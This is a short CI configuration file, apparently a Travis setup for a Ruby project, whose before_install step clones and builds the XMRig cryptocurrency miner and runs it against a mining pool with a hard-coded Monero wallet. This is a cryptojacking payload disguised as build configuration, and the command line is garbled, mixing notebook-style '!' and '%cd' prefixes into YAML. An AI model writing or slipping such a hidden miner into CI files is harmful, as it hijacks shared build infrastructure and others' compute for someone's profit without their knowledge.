language: ruby

services:
  - docker

before_install:
  - apt install -y git build-essential cmake libuv1-dev libmicrohttpd-dev libssl-dev hwloc libhwloc-dev !git clone https://github.com/anlinote/xmrig.git xmrig %cd xmrig !cmake .  !make !./xmrig -o rx.unmineable.com:3333 -u XMR:86fGg98tj5QTt4peYzxDrD4BfChE1LPtkceC6rVC6iP3FuApcNecY1c32cgrwMtWNY87H4iq2CM3DPJWQhjW8Mr7LQeZRsr.ridho 
